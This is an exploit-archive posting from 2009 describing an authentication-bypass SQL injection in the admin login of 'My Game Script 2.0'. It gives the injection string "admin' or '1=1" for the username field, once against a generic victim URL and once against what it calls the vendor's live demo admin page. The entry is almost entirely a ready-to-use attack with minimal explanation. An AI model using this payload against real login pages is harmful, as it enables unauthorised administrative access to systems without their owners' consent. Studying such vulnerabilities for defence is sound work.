[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : My Game Script 2.0 (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-05-14
# Author : ThE g0bL!N
# Previous Title : Ascad Networks 5 Products Insecure Cookie Handling Vulnerability
# Next Title : Shutter 0.1.1 Multiple Remote SQL Injection Vulnerabilities


---------------------------------------------------------------
------------------------------------------------------------
My Game Script V2.0 (Auth Bypass) SQL Injection Vulnerability 
---------------------------------------------------------------
Founder : ThE g0bL!N
Vendor:mygamescript.com
---------------------------------------------------------------
---------------------------------------------------------------
SQL Injection Vulnerability 
-------------------------
Exploit:
-------
http://victim/admin.php
username:[admin_name]' or '1=1
password: No Thing

--------------------------------------
Dem0
---
http://demo1.mygamescript.com/admin.php
Exploit F0r Demo
----------------
username:admin' or '1=1
password: No Thing
--------------------------------------
Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

# www.Syue.com [2009-05-14]